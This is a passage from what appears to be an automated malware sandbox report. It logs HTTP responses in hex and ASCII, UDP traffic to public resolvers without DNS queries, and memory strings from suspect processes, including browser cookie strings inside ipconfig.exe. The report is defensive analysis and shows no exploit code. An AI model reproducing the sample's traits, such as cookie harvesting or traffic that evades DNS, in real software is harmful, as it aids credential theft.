ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 32 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 00 00 ff ff 03 00 92 54 0e 5c 0d 00 00 00 0d 0a Data Ascii: 27210Q/Qp/KT\
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:06 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:06 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Jul 2019 14:50:08 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Jul 2019 14:50:08 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:38 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:40 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 29 Nov 2021 13:11:47 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:12:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0expires: 0last-modified: Mon, 29 Nov 2021 13:12:35 GMTpragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vih0tsY4%2FyyqnkOqfOwNC6uGd%2FXb0bcfBv7j9zgq8DwIQJSkKhYl7xKGt1F24kkT10OiKghMq68juGm%2F2ZYMCNIMZtIM6Kqu5MB0yRAjy95aCUAIIHW2LXY1qmRy%2BNGkutk4mNHmPr6fSNw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b5c16a60bbd1f45-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: d404 Not Found
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: ipconfig.exe, 0000000E.00000002.30172038806.0000000004C12000.00000004.00020000.sdmp, ipconfig.exe, 0000000E.00000003.29059324581.0000000003635000.00000004.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30171029681.000000000453C000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28478427328.0000000023002000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
        Source: ipconfig.exe, 0000000E.00000002.30172038806.0000000004C12000.00000004.00020000.sdmp, ipconfig.exe, 0000000E.00000003.29059324581.0000000003635000.00000004.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30171029681.000000000453C000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28478427328.0000000023002000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
        Source: ipconfig.exe, 0000000E.00000002.30172038806.0000000004C12000.00000004.00020000.sdmp, ipconfig.exe, 0000000E.00000003.29059324581.0000000003635000.00000004.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30171029681.000000000453C000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28478427328.0000000023002000.00000004.00020000.sdmpString found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
        Source: BL_CI_PL.exe, 0000000A.00000003.26181792782.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26189181508.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860584762.00000000008F8000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858476756.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25859912712.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861285392.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858886240.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861987953.00000000008F8000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29294372742.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29257058269.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29299837438.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256180897.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: BL_CI_PL.exe, 0000000A.00000003.26181792782.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26189181508.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25860584762.00000000008F8000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858476756.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25859912712.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861285392.00000000008F5000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25858886240.00000000008FA000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.25861987953.00000000008F8000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29294372742.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29257058269.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29299837438.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256180897.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25973697287.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25878475451.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25922430683.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26089973057.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25973697287.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25878475451.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25922430683.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26089973057.0000000009BAF000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: explorer.exe, 0000000D.00000000.25997352593.0000000011282000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26113928671.0000000011282000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896576995.0000000011282000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlYE
        Source: explorer.exe, 0000000D.00000000.26114272250.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25997655299.00000000112B7000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896814606.00000000112B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
